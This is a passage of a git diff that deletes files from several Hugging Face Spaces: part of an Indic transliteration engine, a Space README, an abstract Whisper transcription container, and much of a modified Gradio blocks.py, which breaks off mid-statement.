print(XlitError.loading_err.value) - - def download_models(self, models_path): - """ - Download models from GitHub Releases if not exists - """ - for l in self.lang_config: - lang_name = self.lang_config[l]["eng_name"] - lang_model_path = os.path.join(models_path, lang_name) - if not os.path.isdir(lang_model_path): - print("Downloading model for language: %s" % lang_name) - remote_url = MODEL_DOWNLOAD_URL_PREFIX + lang_name + ".zip" - downloaded_zip_path = os.path.join(models_path, lang_name + ".zip") - dload(url=remote_url, save_to_path=downloaded_zip_path, max_time=None) - - if not os.path.isfile(downloaded_zip_path): - exit( - f"ERROR: Unable to download model from {remote_url} into {models_path}" - ) - - with zipfile.ZipFile(downloaded_zip_path, "r") as zip_ref: - zip_ref.extractall(models_path) - - if os.path.isdir(lang_model_path): - os.remove(downloaded_zip_path) - else: - exit( - f"ERROR: Unable to find models in {lang_model_path} after download" - ) - return - - def translit_word(self, eng_word, lang_code="default", topk=7, beam_width=10): - if eng_word == "": - return [] - - if lang_code in self.langs: - try: - res_list = self.lang_model[lang_code].inferencer( - eng_word, beam_width=beam_width - ) - return res_list[:topk] - - except Exception as error: - print("XlitError:", traceback.format_exc()) - print(XlitError.internal_err.value) - return XlitError.internal_err - - elif lang_code == "default": - try: - res_dict = {} - for la in self.lang_model: - res = self.lang_model[la].inferencer( - eng_word, beam_width=beam_width - ) - res_dict[la] = res[:topk] - return res_dict - - except Exception as error: - print("XlitError:", traceback.format_exc()) - print(XlitError.internal_err.value) - return XlitError.internal_err - - else: - print("XlitError: Unknown Langauge requested", lang_code) - print(XlitError.lang_err.value) - return XlitError.lang_err - - def translit_sentence(self, eng_sentence, lang_code="default", beam_width=10): - if eng_sentence == "": - return [] - - if lang_code in self.langs: - try: - out_str = "" - for word in eng_sentence.split(): - res_ = self.lang_model[lang_code].inferencer( - word, beam_width=beam_width - ) - out_str = out_str + res_[0] + " " - return out_str[:-1] - - except Exception as error: - print("XlitError:", traceback.format_exc()) - 
print(XlitError.internal_err.value) - return XlitError.internal_err - - elif lang_code == "default": - try: - res_dict = {} - for la in self.lang_model: - out_str = "" - for word in eng_sentence.split(): - res_ = self.lang_model[la].inferencer( - word, beam_width=beam_width - ) - out_str = out_str + res_[0] + " " - res_dict[la] = out_str[:-1] - return res_dict - - except Exception as error: - print("XlitError:", traceback.format_exc()) - print(XlitError.internal_err.value) - return XlitError.internal_err - - else: - print("XlitError: Unknown Langauge requested", lang_code) - print(XlitError.lang_err.value) - return XlitError.lang_err - - -if __name__ == "__main__": - - available_lang = [ - "bn", - "gu", - "hi", - "kn", - "gom", - "mai", - "ml", - "mr", - "pa", - "sd", - "si", - "ta", - "te", - "ur", - ] - - reg = re.compile(r"[a-zA-Z]") - lang = "hi" - engine = XlitEngine( - lang - ) # if you don't specify lang code here, this will give results in all langs available - sent = "Hello World! ABCD क्या हाल है आपका?" - words = [ - engine.translit_word(word, topk=1)[lang][0] if reg.match(word) else word - for word in sent.split() - ] # only transliterated en words, leaves rest as it is - updated_sent = " ".join(words) - - print(updated_sent) - - # output : हेलो वर्ल्ड! क्या हाल है आपका? - - # y = engine.translit_sentence("Hello World !")['hi'] - # print(y) diff --git a/spaces/Harveenchadha/en_to_indic_translation/indic_nlp_library/indicnlp/normalize/__init__.py b/spaces/Harveenchadha/en_to_indic_translation/indic_nlp_library/indicnlp/normalize/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/Hasan777/IlluminatiAI-Illuminati_Diffusion_v1.0/README.md b/spaces/Hasan777/IlluminatiAI-Illuminati_Diffusion_v1.0/README.md deleted file mode 100644 index 16118f711e72d59b6012922f8f87d106ec7e4443..0000000000000000000000000000000000000000 --- a/spaces/Hasan777/IlluminatiAI-Illuminati_Diffusion_v1.0/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: IlluminatiAI-Illuminati Diffusion V1.0 -emoji: 💩 -colorFrom: gray -colorTo: green -sdk: gradio -sdk_version: 3.19.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/HgMenon/Transcribe_V0.2/src/whisper/abstractWhisperContainer.py b/spaces/HgMenon/Transcribe_V0.2/src/whisper/abstractWhisperContainer.py deleted file mode 100644 index d14fb23d24256e3f1c12d8ae1db6ece891d49ec8..0000000000000000000000000000000000000000 --- a/spaces/HgMenon/Transcribe_V0.2/src/whisper/abstractWhisperContainer.py +++ /dev/null @@ -1,122 +0,0 @@ -import abc -from typing import List -from src.config import ModelConfig, VadInitialPromptMode - -from src.hooks.progressListener import ProgressListener -from src.modelCache import GLOBAL_MODEL_CACHE, ModelCache - -class AbstractWhisperCallback: - @abc.abstractmethod - def invoke(self, audio, segment_index: int, prompt: str, detected_language: str, progress_listener: ProgressListener = None): - """ - Peform the transcription of the given audio file or data. - - Parameters - ---------- - audio: Union[str, np.ndarray, torch.Tensor] - The audio file to transcribe, or the audio data as a numpy array or torch tensor. - segment_index: int - The target language of the transcription. If not specified, the language will be inferred from the audio content. - task: str - The task - either translate or transcribe. 
- progress_listener: ProgressListener - A callback to receive progress updates. - """ - raise NotImplementedError() - - def _get_initial_prompt(self, initial_prompt: str, initial_prompt_mode: VadInitialPromptMode, - prompt: str, segment_index: int): - if (initial_prompt_mode == VadInitialPromptMode.PREPEND_ALL_SEGMENTS): - return self._concat_prompt(initial_prompt, prompt) - elif (initial_prompt_mode == VadInitialPromptMode.PREPREND_FIRST_SEGMENT): - return self._concat_prompt(initial_prompt, prompt) if segment_index == 0 else prompt - else: - raise ValueError(f"Unknown initial prompt mode {initial_prompt_mode}") - - def _concat_prompt(self, prompt1, prompt2): - if (prompt1 is None): - return prompt2 - elif (prompt2 is None): - return prompt1 - else: - return prompt1 + " " + prompt2 - -class AbstractWhisperContainer: - def __init__(self, model_name: str, device: str = None, compute_type: str = "float16", - download_root: str = None, - cache: ModelCache = None, models: List[ModelConfig] = []): - self.model_name = model_name - self.device = device - self.compute_type = compute_type - self.download_root = download_root - self.cache = cache - - # Will be created on demand - self.model = None - - # List of known models - self.models = models - - def get_model(self): - if self.model is None: - - if (self.cache is None): - self.model = self._create_model() - else: - model_key = "WhisperContainer." + self.model_name + ":" + (self.device if self.device else '') - self.model = self.cache.get(model_key, self._create_model) - return self.model - - @abc.abstractmethod - def _create_model(self): - raise NotImplementedError() - - def ensure_downloaded(self): - pass - - @abc.abstractmethod - def create_callback(self, language: str = None, task: str = None, initial_prompt: str = None, - initial_prompt_mode: VadInitialPromptMode = VadInitialPromptMode.PREPREND_FIRST_SEGMENT, - **decodeOptions: dict) -> AbstractWhisperCallback: - """ - Create a WhisperCallback object that can be used to transcript audio files. - - Parameters - ---------- - language: str - The target language of the transcription. If not specified, the language will be inferred from the audio content. - task: str - The task - either translate or transcribe. - initial_prompt: str - The initial prompt to use for the transcription. - initial_prompt_mode: VadInitialPromptMode - The mode to use for the initial prompt. If set to PREPEND_FIRST_SEGMENT, the initial prompt will be prepended to the first segment of audio. - If set to PREPEND_ALL_SEGMENTS, the initial prompt will be prepended to all segments of audio. - decodeOptions: dict - Additional options to pass to the decoder. Must be pickleable. - - Returns - ------- - A WhisperCallback object. 
- """ - raise NotImplementedError() - - # This is required for multiprocessing - def __getstate__(self): - return { - "model_name": self.model_name, - "device": self.device, - "download_root": self.download_root, - "models": self.models, - "compute_type": self.compute_type - } - - def __setstate__(self, state): - self.model_name = state["model_name"] - self.device = state["device"] - self.download_root = state["download_root"] - self.models = state["models"] - self.compute_type = state["compute_type"] - self.model = None - # Depickled objects must use the global cache - self.cache = GLOBAL_MODEL_CACHE \ No newline at end of file diff --git a/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/blocks.py b/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/blocks.py deleted file mode 100644 index dad4090c747cba3d38689642f4b5f17f5a004a58..0000000000000000000000000000000000000000 --- a/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/blocks.py +++ /dev/null @@ -1,1673 +0,0 @@ -from __future__ import annotations - -import copy -import getpass -import inspect -import json -import os -import pkgutil -import random -import sys -import time -import warnings -import webbrowser -from abc import abstractmethod -from pathlib import Path -from types import ModuleType -from typing import TYPE_CHECKING, Any, Callable, Dict, Iterator, List, Set, Tuple, Type - -import anyio -import requests -from anyio import CapacityLimiter -from typing_extensions import Literal - -from gradio import ( - components, - encryptor, - external, - networking, - queueing, - routes, - strings, - utils, -) -from gradio.context import Context -from gradio.deprecation import check_deprecated_parameters -from gradio.documentation import document, set_documentation_group -from gradio.exceptions import DuplicateBlockError, InvalidApiName -from gradio.helpers import create_tracker, skip, special_args -from gradio.tunneling import CURRENT_TUNNELS -from gradio.utils import ( - TupleNoPrint, - check_function_inputs_match, - component_or_layout_class, - delete_none, - get_cancel_function, - get_continuous_fn, -) - -set_documentation_group("blocks") - - -if TYPE_CHECKING: # Only import for type checking (is False at runtime). - import comet_ml - from fastapi.applications import FastAPI - - from gradio.components import Component - - -class Block: - def __init__( - self, - *, - render: bool = True, - elem_id: str | None = None, - visible: bool = True, - root_url: str | None = None, # URL that is prepended to all file paths - _skip_init_processing: bool = False, # Used for loading from Spaces - **kwargs, - ): - self._id = Context.id - Context.id += 1 - self.visible = visible - self.elem_id = elem_id - self.root_url = root_url - self._skip_init_processing = _skip_init_processing - self._style = {} - self.parent: BlockContext | None = None - - if render: - self.render() - check_deprecated_parameters(self.__class__.__name__, **kwargs) - - def render(self): - """ - Adds self into appropriate BlockContext - """ - if Context.root_block is not None and self._id in Context.root_block.blocks: - raise DuplicateBlockError( - f"A block with id: {self._id} has already been rendered in the current Blocks." 
- ) - if Context.block is not None: - Context.block.add(self) - if Context.root_block is not None: - Context.root_block.blocks[self._id] = self - if isinstance(self, components.TempFileManager): - Context.root_block.temp_file_sets.append(self.temp_files) - return self - - def unrender(self): - """ - Removes self from BlockContext if it has been rendered (otherwise does nothing). - Removes self from the layout and collection of blocks, but does not delete any event triggers. - """ - if Context.block is not None: - try: - Context.block.children.remove(self) - except ValueError: - pass - if Context.root_block is not None: - try: - del Context.root_block.blocks[self._id] - except KeyError: - pass - return self - - def get_block_name(self) -> str: - """ - Gets block's class name. - - If it is template component it gets the parent's class name. - - @return: class name - """ - return ( - self.__class__.__base__.__name__.lower() - if hasattr(self, "is_template") - else self.__class__.__name__.lower() - ) - - def get_expected_parent(self) -> Type[BlockContext] | None: - return None - - def set_event_trigger( - self, - event_name: str, - fn: Callable | None, - inputs: Component | List[Component] | Set[Component] | None, - outputs: Component | List[Component] | None, - preprocess: bool = True, - postprocess: bool = True, - scroll_to_output: bool = False, - show_progress: bool = True, - api_name: str | None = None, - js: str | None = None, - no_target: bool = False, - queue: bool | None = None, - batch: bool = False, - max_batch_size: int = 4, - cancels: List[int] | None = None, - every: float | None = None, - ) -> Dict[str, Any]: - """ - Adds an event to the component's dependencies. - Parameters: - event_name: event name - fn: Callable function - inputs: input list - outputs: output list - preprocess: whether to run the preprocess methods of components - postprocess: whether to run the postprocess methods of components - scroll_to_output: whether to scroll to output of dependency on trigger - show_progress: whether to show progress animation while running. - api_name: Defining this parameter exposes the endpoint in the api docs - js: Optional frontend js method to run before running 'fn'. Input arguments for js method are values of 'inputs' and 'outputs', return should be a list of values for output components - no_target: if True, sets "targets" to [], used for Blocks "load" event - batch: whether this function takes in a batch of inputs - max_batch_size: the maximum batch size to send to the function - cancels: a list of other events to cancel when this event is triggered. For example, setting cancels=[click_event] will cancel the click_event, where click_event is the return value of another components .click method. - Returns: None - """ - # Support for singular parameter - if isinstance(inputs, set): - inputs_as_dict = True - inputs = sorted(inputs, key=lambda x: x._id) - else: - inputs_as_dict = False - if inputs is None: - inputs = [] - elif not isinstance(inputs, list): - inputs = [inputs] - - if isinstance(outputs, set): - outputs = sorted(outputs, key=lambda x: x._id) - else: - if outputs is None: - outputs = [] - elif not isinstance(outputs, list): - outputs = [outputs] - - if fn is not None and not cancels: - check_function_inputs_match(fn, inputs, inputs_as_dict) - - if Context.root_block is None: - raise AttributeError( - f"{event_name}() and other events can only be called within a Blocks context." 
- ) - if every is not None and every <= 0: - raise ValueError("Parameter every must be positive or None") - if every and batch: - raise ValueError( - f"Cannot run {event_name} event in a batch and every {every} seconds. " - "Either batch is True or every is non-zero but not both." - ) - - if every and fn: - fn = get_continuous_fn(fn, every) - elif every: - raise ValueError("Cannot set a value for `every` without a `fn`.") - - Context.root_block.fns.append( - BlockFunction(fn, inputs, outputs, preprocess, postprocess, inputs_as_dict) - ) - if api_name is not None: - api_name_ = utils.append_unique_suffix( - api_name, [dep["api_name"] for dep in Context.root_block.dependencies] - ) - if not (api_name == api_name_): - warnings.warn( - "api_name {} already exists, using {}".format(api_name, api_name_) - ) - api_name = api_name_ - - dependency = { - "targets": [self._id] if not no_target else [], - "trigger": event_name, - "inputs": [block._id for block in inputs], - "outputs": [block._id for block in outputs], - "backend_fn": fn is not None, - "js": js, - "queue": False if fn is None else queue, - "api_name": api_name, - "scroll_to_output": scroll_to_output, - "show_progress": show_progress, - "every": every, - "batch": batch, - "max_batch_size": max_batch_size, - "cancels": cancels or [], - } - Context.root_block.dependencies.append(dependency) - return dependency - - def get_config(self): - return { - "visible": self.visible, - "elem_id": self.elem_id, - "style": self._style, - "root_url": self.root_url, - } - - @staticmethod - @abstractmethod - def update(**kwargs) -> Dict: - return {} - - @classmethod - def get_specific_update(cls, generic_update: Dict[str, Any]) -> Dict: - del generic_update["__type__"] - specific_update = cls.update(**generic_update) - return specific_update - - -class BlockContext(Block): - def __init__( - self, - visible: bool = True, - render: bool = True, - **kwargs, - ): - """ - Parameters: - visible: If False, this will be hidden but included in the Blocks config file (its visibility can later be updated). - render: If False, this will not be included in the Blocks config file at all. - """ - self.children: List[Block] = [] - super().__init__(visible=visible, render=render, **kwargs) - - def __enter__(self): - self.parent = Context.block - Context.block = self - return self - - def add(self, child: Block): - child.parent = self - self.children.append(child) - - def fill_expected_parents(self): - children = [] - pseudo_parent = None - for child in self.children: - expected_parent = child.get_expected_parent() - if not expected_parent or isinstance(self, expected_parent): - pseudo_parent = None - children.append(child) - else: - if pseudo_parent is not None and isinstance( - pseudo_parent, expected_parent - ): - pseudo_parent.children.append(child) - else: - pseudo_parent = expected_parent(render=False) - children.append(pseudo_parent) - pseudo_parent.children = [child] - if Context.root_block: - Context.root_block.blocks[pseudo_parent._id] = pseudo_parent - child.parent = pseudo_parent - self.children = children - - def __exit__(self, *args): - if getattr(self, "allow_expected_parents", True): - self.fill_expected_parents() - Context.block = self.parent - - def postprocess(self, y): - """ - Any postprocessing needed to be performed on a block context. 
- """ - return y - - -class BlockFunction: - def __init__( - self, - fn: Callable | None, - inputs: List[Component], - outputs: List[Component], - preprocess: bool, - postprocess: bool, - inputs_as_dict: bool, - ): - self.fn = fn - self.inputs = inputs - self.outputs = outputs - self.preprocess = preprocess - self.postprocess = postprocess - self.total_runtime = 0 - self.total_runs = 0 - self.inputs_as_dict = inputs_as_dict - - def __str__(self): - return str( - { - "fn": getattr(self.fn, "__name__", "fn") - if self.fn is not None - else None, - "preprocess": self.preprocess, - "postprocess": self.postprocess, - } - ) - - def __repr__(self): - return str(self) - - -class class_or_instancemethod(classmethod): - def __get__(self, instance, type_): - descr_get = super().__get__ if instance is None else self.__func__.__get__ - return descr_get(instance, type_) - - -def postprocess_update_dict(block: Block, update_dict: Dict, postprocess: bool = True): - """ - Converts a dictionary of updates into a format that can be sent to the frontend. - E.g. {"__type__": "generic_update", "value": "2", "interactive": False} - Into -> {"__type__": "update", "value": 2.0, "mode": "static"} - - Parameters: - block: The Block that is being updated with this update dictionary. - update_dict: The original update dictionary - postprocess: Whether to postprocess the "value" key of the update dictionary. - """ - if update_dict.get("__type__", "") == "generic_update": - update_dict = block.get_specific_update(update_dict) - if update_dict.get("value") is components._Keywords.NO_VALUE: - update_dict.pop("value") - prediction_value = delete_none(update_dict, skip_value=True) - if "value" in prediction_value and postprocess: - assert isinstance( - block, components.IOComponent - ), f"Component {block.__class__} does not support value" - prediction_value["value"] = block.postprocess(prediction_value["value"]) - return prediction_value - - -def convert_component_dict_to_list( - outputs_ids: List[int], predictions: Dict -) -> List | Dict: - """ - Converts a dictionary of component updates into a list of updates in the order of - the outputs_ids and including every output component. Leaves other types of dictionaries unchanged. - E.g. {"textbox": "hello", "number": {"__type__": "generic_update", "value": "2"}} - Into -> ["hello", {"__type__": "generic_update"}, {"__type__": "generic_update", "value": "2"}] - """ - keys_are_blocks = [isinstance(key, Block) for key in predictions.keys()] - if all(keys_are_blocks): - reordered_predictions = [skip() for _ in outputs_ids] - for component, value in predictions.items(): - if component._id not in outputs_ids: - raise ValueError( - f"Returned component {component} not specified as output of function." - ) - output_index = outputs_ids.index(component._id) - reordered_predictions[output_index] = value - predictions = utils.resolve_singleton(reordered_predictions) - elif any(keys_are_blocks): - raise ValueError( - "Returned dictionary included some keys as Components. Either all keys must be Components to assign Component values, or return a List of values to assign output values in order." - ) - return predictions - - -@document("load") -class Blocks(BlockContext): - """ - Blocks is Gradio's low-level API that allows you to create more custom web - applications and demos than Interfaces (yet still entirely in Python). 
- - - Compared to the Interface class, Blocks offers more flexibility and control over: - (1) the layout of components (2) the events that - trigger the execution of functions (3) data flows (e.g. inputs can trigger outputs, - which can trigger the next level of outputs). Blocks also offers ways to group - together related demos such as with tabs. - - - The basic usage of Blocks is as follows: create a Blocks object, then use it as a - context (with the "with" statement), and then define layouts, components, or events - within the Blocks context. Finally, call the launch() method to launch the demo. - - Example: - import gradio as gr - def update(name): - return f"Welcome to Gradio, {name}!" - - with gr.Blocks() as demo: - gr.Markdown("Start typing below and then click **Run** to see the output.") - with gr.Row(): - inp = gr.Textbox(placeholder="What is your name?") - out = gr.Textbox() - btn = gr.Button("Run") - btn.click(fn=update, inputs=inp, outputs=out) - - demo.launch() - Demos: blocks_hello, blocks_flipper, blocks_speech_text_sentiment, generate_english_german, sound_alert - Guides: blocks_and_event_listeners, controlling_layout, state_in_blocks, custom_CSS_and_JS, custom_interpretations_with_blocks, using_blocks_like_functions - """ - - def __init__( - self, - theme: str = "default", - analytics_enabled: bool | None = None, - mode: str = "blocks", - title: str = "Gradio", - css: str | None = None, - **kwargs, - ): - """ - Parameters: - theme: which theme to use - right now, only "default" is supported. - analytics_enabled: whether to allow basic telemetry. If None, will use GRADIO_ANALYTICS_ENABLED environment variable or default to True. - mode: a human-friendly name for the kind of Blocks or Interface being created. - title: The tab title to display when this is opened in a browser window. - css: custom css or path to custom css file to apply to entire Blocks - """ - # Cleanup shared parameters with Interface #TODO: is this part still necessary after Interface with Blocks? 
- self.limiter = None - self.save_to = None - self.theme = theme - self.encrypt = False - self.share = False - self.enable_queue = None - self.max_threads = 40 - self.show_error = True - if css is not None and Path(css).exists(): - with open(css) as css_file: - self.css = css_file.read() - else: - self.css = css - - # For analytics_enabled and allow_flagging: (1) first check for - # parameter, (2) check for env variable, (3) default to True/"manual" - self.analytics_enabled = ( - analytics_enabled - if analytics_enabled is not None - else os.getenv("GRADIO_ANALYTICS_ENABLED", "True") == "True" - ) - - super().__init__(render=False, **kwargs) - self.blocks: Dict[int, Block] = {} - self.fns: List[BlockFunction] = [] - self.dependencies = [] - self.mode = mode - - self.is_running = False - self.local_url = None - self.share_url = None - self.width = None - self.height = None - self.api_open = True - - self.ip_address = "" - self.is_space = True if os.getenv("SYSTEM") == "spaces" else False - self.favicon_path = None - self.auth = None - self.dev_mode = True - self.app_id = random.getrandbits(64) - self.temp_file_sets = [] - self.title = title - self.show_api = True - - # Only used when an Interface is loaded from a config - self.predict = None - self.input_components = None - self.output_components = None - self.__name__ = None - self.api_mode = None - - if self.analytics_enabled: - self.ip_address = utils.get_local_ip_address() - data = { - "mode": self.mode, - "ip_address": self.ip_address, - "custom_css": self.css is not None, - "theme": self.theme, - "version": (pkgutil.get_data(__name__, "version.txt") or b"") - .decode("ascii") - .strip(), - } - utils.initiated_analytics(data) - - @classmethod - def from_config( - cls, config: dict, fns: List[Callable], root_url: str | None = None - ) -> Blocks: - """ - Factory method that creates a Blocks from a config and list of functions. - - Parameters: - config: a dictionary containing the configuration of the Blocks. - fns: a list of functions that are used in the Blocks. Must be in the same order as the dependencies in the config. - root_url: an optional root url to use for the components in the Blocks. Allows serving files from an external URL. - """ - config = copy.deepcopy(config) - components_config = config["components"] - original_mapping: Dict[int, Block] = {} - - def get_block_instance(id: int) -> Block: - for block_config in components_config: - if block_config["id"] == id: - break - else: - raise ValueError("Cannot find block with id {}".format(id)) - cls = component_or_layout_class(block_config["type"]) - block_config["props"].pop("type", None) - block_config["props"].pop("name", None) - style = block_config["props"].pop("style", None) - if block_config["props"].get("root_url") is None and root_url: - block_config["props"]["root_url"] = root_url + "/" - # Any component has already processed its initial value, so we skip that step here - block = cls(**block_config["props"], _skip_init_processing=True) - if style and isinstance(block, components.IOComponent): - block.style(**style) - return block - - def iterate_over_children(children_list): - for child_config in children_list: - id = child_config["id"] - block = get_block_instance(id) - - original_mapping[id] = block - - children = child_config.get("children") - if children is not None: - assert isinstance( - block, BlockContext - ), f"Invalid config, Block with id {id} has children but is not a BlockContext." 
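- # recurse into this container block so its nested children are instantiated inside it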
- with block: - iterate_over_children(children) - - with Blocks(theme=config["theme"], css=config["theme"]) as blocks: - # ID 0 should be the root Blocks component - original_mapping[0] = Context.root_block or blocks - - iterate_over_children(config["layout"]["children"]) - - first_dependency = None - - # add the event triggers - for dependency, fn in zip(config["dependencies"], fns): - # We used to add a "fake_event" to the config to cache examples - # without removing it. This was causing bugs in calling gr.Interface.load - # We fixed the issue by removing "fake_event" from the config in examples.py - # but we still need to skip these events when loading the config to support - # older demos - if dependency["trigger"] == "fake_event": - continue - targets = dependency.pop("targets") - trigger = dependency.pop("trigger") - dependency.pop("backend_fn") - dependency.pop("documentation", None) - dependency["inputs"] = [ - original_mapping[i] for i in dependency["inputs"] - ] - dependency["outputs"] = [ - original_mapping[o] for o in dependency["outputs"] - ] - dependency.pop("status_tracker", None) - dependency["preprocess"] = False - dependency["postprocess"] = False - - for target in targets: - dependency = original_mapping[target].set_event_trigger( - event_name=trigger, fn=fn, **dependency - ) - if first_dependency is None: - first_dependency = dependency - - # Allows some use of Interface-specific methods with loaded Spaces - if first_dependency and Context.root_block: - blocks.predict = [fns[0]] - blocks.input_components = [ - Context.root_block.blocks[i] for i in first_dependency["inputs"] - ] - blocks.output_components = [ - Context.root_block.blocks[o] for o in first_dependency["outputs"] - ] - blocks.__name__ = "Interface" - blocks.api_mode = True - - return blocks - - def __str__(self): - return self.__repr__() - - def __repr__(self): - num_backend_fns = len([d for d in self.dependencies if d["backend_fn"]]) - repr = f"Gradio Blocks instance: {num_backend_fns} backend functions" - repr += "\n" + "-" * len(repr) - for d, dependency in enumerate(self.dependencies): - if dependency["backend_fn"]: - repr += f"\nfn_index={d}" - repr += "\n inputs:" - for input_id in dependency["inputs"]: - block = self.blocks[input_id] - repr += "\n |-{}".format(str(block)) - repr += "\n outputs:" - for output_id in dependency["outputs"]: - block = self.blocks[output_id] - repr += "\n |-{}".format(str(block)) - return repr - - def render(self): - if Context.root_block is not None: - if self._id in Context.root_block.blocks: - raise DuplicateBlockError( - f"A block with id: {self._id} has already been rendered in the current Blocks." - ) - if not set(Context.root_block.blocks).isdisjoint(self.blocks): - raise DuplicateBlockError( - "At least one block in this Blocks has already been rendered." 
- ) - - Context.root_block.blocks.update(self.blocks) - Context.root_block.fns.extend(self.fns) - dependency_offset = len(Context.root_block.dependencies) - for i, dependency in enumerate(self.dependencies): - api_name = dependency["api_name"] - if api_name is not None: - api_name_ = utils.append_unique_suffix( - api_name, - [dep["api_name"] for dep in Context.root_block.dependencies], - ) - if not (api_name == api_name_): - warnings.warn( - "api_name {} already exists, using {}".format( - api_name, api_name_ - ) - ) - dependency["api_name"] = api_name_ - dependency["cancels"] = [ - c + dependency_offset for c in dependency["cancels"] - ] - # Recreate the cancel function so that it has the latest - # dependency fn indices. This is necessary to properly cancel - # events in the backend - if dependency["cancels"]: - updated_cancels = [ - Context.root_block.dependencies[i] - for i in dependency["cancels"] - ] - new_fn = BlockFunction( - get_cancel_function(updated_cancels)[0], - [], - [], - False, - True, - False, - ) - Context.root_block.fns[dependency_offset + i] = new_fn - Context.root_block.dependencies.append(dependency) - Context.root_block.temp_file_sets.extend(self.temp_file_sets) - - if Context.block is not None: - Context.block.children.extend(self.children) - return self - - def is_callable(self, fn_index: int = 0) -> bool: - """Checks if a particular Blocks function is callable (i.e. not stateful or a generator).""" - block_fn = self.fns[fn_index] - dependency = self.dependencies[fn_index] - - if inspect.isasyncgenfunction(block_fn.fn): - return False - if inspect.isgeneratorfunction(block_fn.fn): - return False - for input_id in dependency["inputs"]: - block = self.blocks[input_id] - if getattr(block, "stateful", False): - return False - for output_id in dependency["outputs"]: - block = self.blocks[output_id] - if getattr(block, "stateful", False): - return False - - return True - - def __call__(self, *inputs, fn_index: int = 0, api_name: str | None = None): - """ - Allows Blocks objects to be called as functions. Supply the parameters to the - function as positional arguments. To choose which function to call, use the - fn_index parameter, which must be a keyword argument. - - Parameters: - *inputs: the parameters to pass to the function - fn_index: the index of the function to call (defaults to 0, which for Interfaces, is the default prediction function) - api_name: The api_name of the dependency to call. Will take precedence over fn_index. - """ - if api_name is not None: - inferred_fn_index = next( - ( - i - for i, d in enumerate(self.dependencies) - if d.get("api_name") == api_name - ), - None, - ) - if inferred_fn_index is None: - raise InvalidApiName(f"Cannot find a function with api_name {api_name}") - fn_index = inferred_fn_index - if not (self.is_callable(fn_index)): - raise ValueError( - "This function is not callable because it is either stateful or is a generator. Please use the .launch() method instead to create an interactive user interface." 
- ) - - inputs = list(inputs) - processed_inputs = self.serialize_data(fn_index, inputs) - batch = self.dependencies[fn_index]["batch"] - if batch: - processed_inputs = [[inp] for inp in processed_inputs] - - outputs = utils.synchronize_async( - self.process_api, - fn_index=fn_index, - inputs=processed_inputs, - request=None, - state={}, - ) - outputs = outputs["data"] - - if batch: - outputs = [out[0] for out in outputs] - - processed_outputs = self.deserialize_data(fn_index, outputs) - processed_outputs = utils.resolve_singleton(processed_outputs) - - return processed_outputs - - async def call_function( - self, - fn_index: int, - processed_input: List[Any], - iterator: Iterator[Any] | None = None, - requests: routes.Request | List[routes.Request] | None = None, - event_id: str | None = None, - ): - """ - Calls function with given index and preprocessed input, and measures process time. - Parameters: - fn_index: index of function to call - processed_input: preprocessed input to pass to function - iterator: iterator to use if function is a generator - requests: requests to pass to function - event_id: id of event in queue - """ - block_fn = self.fns[fn_index] - assert block_fn.fn, f"function with index {fn_index} not defined." - is_generating = False - - if block_fn.inputs_as_dict: - processed_input = [ - { - input_component: data - for input_component, data in zip(block_fn.inputs, processed_input) - } - ] - - if isinstance(requests, list): - request = requests[0] - else: - request = requests - processed_input, progress_index = special_args( - block_fn.fn, - processed_input, - request, - ) - progress_tracker = ( - processed_input[progress_index] if progress_index is not None else None - ) - - start = time.time() - - if iterator is None: # If not a generator function that has already run - if progress_tracker is not None and progress_index is not None: - progress_tracker, fn = create_tracker( - self, event_id, block_fn.fn, progress_tracker.track_tqdm - ) - processed_input[progress_index] = progress_tracker - else: - fn = block_fn.fn - - if inspect.iscoroutinefunction(fn): - prediction = await fn(*processed_input) - else: - prediction = await anyio.to_thread.run_sync( - fn, *processed_input, limiter=self.limiter - ) - else: - prediction = None - - if inspect.isasyncgenfunction(block_fn.fn): - raise ValueError("Gradio does not support async generators.") - if inspect.isgeneratorfunction(block_fn.fn): - if not self.enable_queue: - raise ValueError("Need to enable queue to use generators.") - try: - if iterator is None: - iterator = prediction - prediction = await anyio.to_thread.run_sync( - utils.async_iteration, iterator, limiter=self.limiter - ) - is_generating = True - except StopAsyncIteration: - n_outputs = len(self.dependencies[fn_index].get("outputs")) - prediction = ( - components._Keywords.FINISHED_ITERATING - if n_outputs == 1 - else (components._Keywords.FINISHED_ITERATING,) * n_outputs - ) - iterator = None - - duration = time.time() - start - - return { - "prediction": prediction, - "duration": duration, - "is_generating": is_generating, - "iterator": iterator, - } - - def serialize_data(self, fn_index: int, inputs: List[Any]) -> List[Any]: - dependency = self.dependencies[fn_index] - processed_input = [] - - for i, input_id in enumerate(dependency["inputs"]): - block = self.blocks[input_id] - assert isinstance( - block, components.IOComponent - ), f"{block.__class__} Component with id {input_id} not a valid input component." 
- serialized_input = block.serialize(inputs[i]) - processed_input.append(serialized_input) - - return processed_input - - def deserialize_data(self, fn_index: int, outputs: List[Any]) -> List[Any]: - dependency = self.dependencies[fn_index] - predictions = [] - - for o, output_id in enumerate(dependency["outputs"]): - block = self.blocks[output_id] - assert isinstance( - block, components.IOComponent - ), f"{block.__class__} Component with id {output_id} not a valid output component." - deserialized = block.deserialize(outputs[o]) - predictions.append(deserialized) - - return predictions - - def preprocess_data(self, fn_index: int, inputs: List[Any], state: Dict[int, Any]): - block_fn = self.fns[fn_index] - dependency = self.dependencies[fn_index] - - if block_fn.preprocess: - processed_input = [] - for i, input_id in enumerate(dependency["inputs"]): - block = self.blocks[input_id] - assert isinstance( - block, components.Component - ), f"{block.__class__} Component with id {input_id} not a valid input component." - if getattr(block, "stateful", False): - processed_input.append(state.get(input_id)) - else: - processed_input.append(block.preprocess(inputs[i])) - else: - processed_input = inputs - return processed_input - - def postprocess_data( - self, fn_index: int, predictions: List | Dict, state: Dict[int, Any] - ): - block_fn = self.fns[fn_index] - dependency = self.dependencies[fn_index] - batch = dependency["batch"] - - if type(predictions) is dict and len(predictions) > 0: - predictions = convert_component_dict_to_list( - dependency["outputs"], predictions - ) - - if len(dependency["outputs"]) == 1 and not (batch): - predictions = [ - predictions, - ] - - output = [] - for i, output_id in enumerate(dependency["outputs"]): - if predictions[i] is 